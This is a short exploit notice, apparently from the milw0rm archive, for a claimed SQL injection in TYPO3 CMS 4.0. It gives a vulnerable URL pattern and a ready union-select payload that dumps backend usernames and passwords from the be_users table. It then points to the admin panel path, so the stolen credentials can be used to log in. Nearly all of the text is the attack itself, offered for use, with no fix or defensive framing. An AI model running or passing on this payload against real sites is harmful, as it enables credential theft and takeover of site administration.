#----- TYPO3 CMS 4.0 SQL-Injection Vulnerability #----- ##################################################### # [+] Author : CyberNaj, JxE-13 # # [+] Vulnerability : SQL injection # # [+] Group : Ro0T-MaFia # ##################################################### #----- Info CMS: * Name : TYPO3 * Web : http://typo3.org * dowloand : http://typo3.org/download/packages/ * Country : Venezuela #----- Vulnerability: http://www.host.com/index.php?id=[xxx][showUid]=[SQL-injection]&cHash=[xxx] SQL-injection: -1+union+select+username,2,password,4,5,6,7+from+be_users-- Admin Panel: /typo3/index.php #----- # milw0rm.com [2009-08-06]